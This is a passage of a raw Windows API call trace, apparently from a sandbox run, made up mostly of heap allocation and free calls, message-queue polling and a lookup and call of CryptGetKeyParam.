wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0076.256] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0076.256] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.256] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.257] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.258] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0076.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x6f9708, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0076.259] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetKeyParam") returned 0x777377cb [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.259] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0076.259] CryptGetKeyParam (in: hKey=0x6b8b78, dwParam=0x7, pbData=0x6bb458, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb458*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0076.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0076.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0076.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0076.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0076.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0076.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0076.260] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.260] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.260] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0076.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0076.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0076.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0076.260] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0076.260] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.260] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0076.261] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0076.261] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.261] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0076.261] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.261] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.261] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0076.261] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0076.261] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.261] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.261] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0076.262] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.263] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.263] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0076.263] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0076.263] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0076.263] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.263] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0076.263] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x7c9208 [0076.263] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0076.263] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7c9208 | out: hHeap=0x650000) returned 1 [0076.263] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.263] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0076.263] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.263] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.263] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0076.263] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0076.263] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.263] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.263] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.263] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0076.263] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8c38 [0076.263] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.263] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0076.263] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db58 [0076.263] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0076.263] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0076.263] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96c8 [0076.264] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0076.264] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0076.264] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0076.264] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0076.264] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0076.264] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.264] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0076.264] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0076.264] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.264] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.264] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0076.264] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.264] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.264] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.264] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.264] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0076.264] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0076.264] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0076.264] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.264] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0076.264] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x7c9208 [0076.264] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0076.265] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.265] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0076.265] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0076.265] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0076.265] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.265] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.265] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.265] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0076.265] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0076.265] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0076.265] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.265] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0076.265] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0076.265] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.265] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.265] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0076.265] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0076.265] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.265] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.265] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0076.265] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0076.265] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0076.265] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.266] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.266] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0076.266] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.266] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.266] 